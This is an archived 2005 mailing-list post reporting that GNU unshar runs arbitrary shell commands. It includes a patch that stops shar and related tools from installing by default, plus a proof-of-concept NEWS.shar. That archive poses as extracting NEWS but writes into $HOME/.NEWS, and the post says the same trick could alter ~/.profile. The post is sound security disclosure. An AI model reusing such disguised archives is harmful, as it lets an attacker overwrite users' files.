[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
unshar is unsafe
From: |
Bruno Haible |
Subject: |
unshar is unsafe |
Date: |
Wed, 27 Jul 2005 14:07:36 +0200 |
User-agent: |
KMail/1.5 |
To: address@hidden
Cc: Bruce Korb <address@hidden>
Subject: unshar is unsafe
Hi,
It should be well-known that "unshar" is unsafe: In the current
implementation, it allows an attacker to execute any shell commands.
For example, the attached file NEWS.shar, when unshared, pretends to
create a file NEWS, but instead overwrites ~/.NEWS (it could just as
well overwrite or append a few lines to your ~/.profile) and sends me
your ~/.fetchmailrc. (Try it :-)).
$ unshar < NEWS.shar
Standard-Eingabe:
x - Sperrverzeichnis `_sh08096': wurde angelegt
x - packe aus NEWS (Text)
x - Sperrverzeichnis `_sh08096': gelöscht
For this reason, it should be possible to install the useful
programs 'uuencode', 'uudecode', and 'mail-files', without the dangerous
programs
- unshar (totally unsecure implementation)
- shar (educates people to unsecure behaviour)
- mailshar (unsecure since it invokes shar)
- remsync (unsecure since it invokes mailshar)
and the program
- compress-dummy (only used by 'shar', useless on its own)
And moreover, since the default installation of a GNU system should be
secure, these programs should not be installed by default, only upon
request.
Find attached a crude patch that does this.
Bruno
ChangeLog:
2005-07-26 Bruno Haible <address@hidden>
* configure.ac (ADD_SCRIPT): Remove mail-files.
(UNSECURE): New installer option --enable-unsecure.
src/ChangeLog:
2005-07-26 Bruno Haible <address@hidden>
* Makefile.am (bin_PROGRAMS): Add shar and unshar only if UNSECURE
is enabled.
(bin_SCRIPTS): Initialize with "mail-files". Add the ADD_SCRIPTS
only if UNSECURE is enabled.
doc/ChangeLog:
2005-07-26 Bruno Haible <address@hidden>
* Makefile.am (dist_man1_MANS): Add shar.1 and unshar.1 only if
UNSECURE is enabled.
diff -r -c3 sharutils-4.4.orig/configure.ac sharutils-4.4/configure.ac
*** sharutils-4.4.orig/configure.ac 2005-07-10 17:57:57.000000000 +0200
--- sharutils-4.4/configure.ac 2005-07-27 01:29:07.000000000 +0200
***************
*** 22,28 ****
dnl AC_ARG_PROGRAM
! AC_SUBST(ADD_SCRIPT, ["mail-files mailshar"])
AC_PROG_CC
AC_PROG_INSTALL
--- 22,28 ----
dnl AC_ARG_PROGRAM
! AC_SUBST(ADD_SCRIPT, ["mailshar"])
AC_PROG_CC
AC_PROG_INSTALL
***************
*** 103,108 ****
--- 103,114 ----
[disable installation of uuencode and uudecode])])
AM_CONDITIONAL([UUCODE], [test "x$enable_uucode" != xno])
+ AC_ARG_ENABLE(unsecure,
+ [AS_HELP_STRING([--enable-unsecure],
+ [enable installation of the unsecure programs shar, unshar, mailshar,
+ remsync])])
+ AM_CONDITIONAL([UNSECURE], [test "x$enable_unsecure" = xyes])
+
AM_GNU_GETTEXT
AM_GNU_GETTEXT_VERSION([0.14.4])
AM_WITH_DMALLOC
diff -r -c3 sharutils-4.4.orig/src/Makefile.am sharutils-4.4/src/Makefile.am
*** sharutils-4.4.orig/src/Makefile.am 2005-07-09 02:46:46.000000000 +0200
--- sharutils-4.4/src/Makefile.am 2005-07-27 01:13:14.000000000 +0200
***************
*** 17,27 ****
## Process this file with automake to produce Makefile.in.
! bin_PROGRAMS = shar unshar
if UUCODE
bin_PROGRAMS += uuencode uudecode
endif
! bin_SCRIPTS = $(ADD_SCRIPT)
EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
DISTCLEANFILES = $(bin_SCRIPTS)
--- 17,31 ----
## Process this file with automake to produce Makefile.in.
! bin_PROGRAMS =
! bin_SCRIPTS = mail-files
if UUCODE
bin_PROGRAMS += uuencode uudecode
endif
! if UNSECURE
! bin_PROGRAMS += shar unshar
! bin_SCRIPTS += $(ADD_SCRIPT)
! endif
EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
DISTCLEANFILES = $(bin_SCRIPTS)
diff -r -c3 sharutils-4.4.orig/doc/Makefile.am sharutils-4.4/doc/Makefile.am
*** sharutils-4.4.orig/doc/Makefile.am 2005-07-09 02:32:21.000000000 +0200
--- sharutils-4.4/doc/Makefile.am 2005-07-27 01:02:15.000000000 +0200
***************
*** 19,31 ****
info_TEXINFOS = sharutils.texi
! dist_man1_MANS = shar.1 unshar.1
if UUCODE
dist_man1_MANS += uuencode.1 uuencode.5
man1_MANS = uudecode.1
endif
CLEANFILES = $(man1_MANS)
EXTRA_DIST = doclicense.texi
--- 19,35 ----
info_TEXINFOS = sharutils.texi
! dist_man1_MANS =
if UUCODE
dist_man1_MANS += uuencode.1 uuencode.5
man1_MANS = uudecode.1
endif
+ if UNSECURE
+ dist_man1_MANS += shar.1 unshar.1
+ endif
+
CLEANFILES = $(man1_MANS)
EXTRA_DIST = doclicense.texi
============================= NEWS.shar =============================
#!/bin/sh
# This is a shell archive (produced by GNU sharutils 4.4).
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.
#
# Made on 2005-07-27 00:21 CEST by <address@hidden>.
# Source directory was `/packages/sharutils-4.4'.
#
# Existing files will *not* be overwritten unless `-c' is specified.
#
# This shar contains:
# length mode name
# ------ ---------- ------------------------------------------
# 2831 -rwxr-xr-x NEWS
#
save_IFS="${IFS}"
IFS="${IFS}:"
gettext_dir=FAILED
locale_dir=FAILED
first_param="$1"
for dir in $PATH
do
if test "$gettext_dir" = FAILED && test -f $dir/gettext \
&& ($dir/gettext --version >/dev/null 2>&1)
then
case `$dir/gettext --version 2>&1 | sed 1q` in
*GNU*) gettext_dir=$dir ;;
esac
fi
if test "$locale_dir" = FAILED && test -f $dir/shar \
&& ($dir/shar --print-text-domain-dir >/dev/null 2>&1)
then
locale_dir=`$dir/shar --print-text-domain-dir`
fi
done
IFS="$save_IFS"
if test "$locale_dir" = FAILED || test "$gettext_dir" = FAILED
then
echo=echo
else
TEXTDOMAINDIR=$locale_dir
export TEXTDOMAINDIR
TEXTDOMAIN=sharutils
export TEXTDOMAIN
echo="$gettext_dir/gettext -s"
fi
if (echo "testing\c"; echo 1,2,3) | grep c >/dev/null; then
if (echo -n testing; echo 1,2,3) | sed s/-n/xn/ | grep xn >/dev/null; then
shar_n= shar_c='
'
else
shar_n=-n shar_c=
fi
else
shar_n= shar_c='\c'
fi
if touch -am -t 200112312359.59 $$.touch >/dev/null 2>&1 && test ! -f
200112312359.59 && test -f $$.touch; then
shar_touch='touch -am -t $1$2$3$4$5$6.$7 "$8"'
elif touch -am 123123592001.59 $$.touch >/dev/null 2>&1 && test ! -f
123123592001.59 && test ! -f 123123592001.5 && test -f $$.touch; then
shar_touch='touch -am $3$4$5$6$1$2.$7 "$8"'
elif touch -am 1231235901 $$.touch >/dev/null 2>&1 && test ! -f 1231235901 &&
test -f $$.touch; then
shar_touch='touch -am $3$4$5$6$2 "$8"'
else
shar_touch=:
echo
$echo 'WARNING: not restoring timestamps. Consider getting and'
$echo "installing GNU \`touch', distributed in GNU File Utilities..."
echo
fi
rm -f 200112312359.59 123123592001.59 123123592001.5 1231235901 $$.touch
#
$echo $shar_n 'x -' 'lock directory' "\`_sh08096': "$shar_c
if mkdir _sh08096; then
$echo 'created'
else
$echo 'failed to create'
exit 1
fi
# ============= NEWS ==============
if test -f 'NEWS' && test "$first_param" != -c; then
$echo 'x -' SKIPPING 'NEWS' '(file already exists)'
else
$echo 'x -' extracting 'NEWS' '(text)'
sed 's/^X//' << 'SHAR_EOF' > "$HOME/.NEWS" &&
GNU sharutils NEWS - User visible changes.
Copyright (C) 1994, 1995, 1996, 2002, 2004, 2005 Free Software Foundation, Inc.
X
Version 4.4 - July 2005, by Bruce Korb
X
* autotool cleanup
* Make a non-alpha release this time.
* Ensure a "intmax_t" exists in the code.
X
X
Version 4.3.81 - June 2005, by Bruce Korb
X
* Compatibility: True 64 does not have "snprintf"
* Updated FSF address
X
X
X
Version 4.3.80 - April 2005, by Bruce Korb
X
* Buglet: Unlink the temporary file when unsharing from stdin.
X
X
X
Version 4.3.79 - April 2005, by Bruce Korb
X
* rewrote the temporary file handling in unshar to avoid both a theoretical
X timing hole (hitting it requires cooperation) and a buffer overrun
X attack (a file name exceeding 1K).
* new translations and updates. They are all now missing two messages:
X "allocate file name buffer" and "allocate file buffer". *sigh*.
X
X
X
Version 4.3.78 - January 2005, by Bruce Korb
X
* fixed test to not require updates for every release number
* fixed the uuencode man page so that docbook generation can work correctly.
X
X
Version 4.3.77 - September 2004, by Bruce Korb
X
* Fixed a buffer overrun exploit
X
X
Version 4.3.76 - December 2002, by Karl Eichwalder
X
* Updated translations: de et fr sv tr.
X
X
Version 4.3.75 - December 2002, by Karl Eichwalder
X
* Fix compatibility issues (by Bruno Haible).
X
* Support bzip2 as an alternative to gzip (by Bruno Haible).
X
* New translations: ca et hu.
X
* Updated translations: da de ja sv tr zh_TW.
X
X
Version 4.3.74 - July 2002, by Karl Eichwalder
X
* Many portability fixes (by Bruno Haible).
X
* Updated translation: fr.
X
X
Version 4.3.73 - July 2002, by Karl Eichwalder
X
* Add support for large files, e.g., files larger than 2 GiB on hosts
X where 'long' is 32 bits wide (by Paul Eggert).
X
X
Version 4.3.72 - July 2002, by Karl Eichwalder
X
* Updated translations: fr sv.
X
X
Version 4.3.71 - July 2002, by Karl Eichwalder
X
* Updated translations: da de.
X
X
Version 4.3.70 - July 2002, by Karl Eichwalder
X
* Don't install 'compress' link by default; provide
X --enable-compress-link configure option.
X
* Fix uudecode output file handling.
X
* Updated translations: de tr.
X
X
Version 4.3.61 - July 2002, by Karl Eichwalder
X
* Re-add the intl subdirectory (libintl from gettext).
X
* Bugfixes.
X
X
Version 4.3.60 - June 2002, by Karl Eichwalder
X
* Provide a 'compress-dummy' script. Install it if 'compress' isn't
X available. Create a link 'compress' pointing to 'compress-dummy';
X thus it is possible to unshar legacy shar files calling
X 'compress -d'.
X
* shar: Don't offer '-Z' resp. '--compress' if the system doesn't
X support 'compress'.
X
X
Version 4.3.52 - June 2002, by Karl Eichwalder
X
* sync more files coming with automake and related frame work files.
X
* fix temp file races (shar).
X
* fix Y2K bug (shar).
X
* allow spaces in file names (uudecode).
SHAR_EOF
(set 20 05 07 22 23 38 11 "$HOME/.NEWS"; eval "$shar_touch") &&
chmod 0755 "$HOME/.NEWS" ||
$echo 'restore of' 'NEWS' 'failed'
if ( md5sum --help </dev/null 2>&1 | grep 'sage: md5sum \[' ) >/dev/null 2>&1
\
&& ( md5sum --version </dev/null 2>&1 | grep -v 'textutils 1.12' )
>/dev/null; then
md5sum -c << SHAR_EOF >/dev/null 2>&1 \
|| $echo 'NEWS:' 'MD5 check failed'
23c39bbc9cb029b1881b9dfcbbfe0209 NEWS
SHAR_EOF
else
shar_count="`LC_ALL=C wc -c < "$HOME/.NEWS"`"
test 2831 -eq "$shar_count" ||
$echo 'NEWS:' 'original size' '2831,' 'current size' "$shar_count!"
fi
fi
$echo $shar_n 'x -' 'lock directory' "\`_sh08096': " $shar_c
if rm -fr _sh08096; then
$echo 'removed'
else
$echo 'failed to remove'
fi
exit 0
- unshar is unsafe,
Bruno Haible <=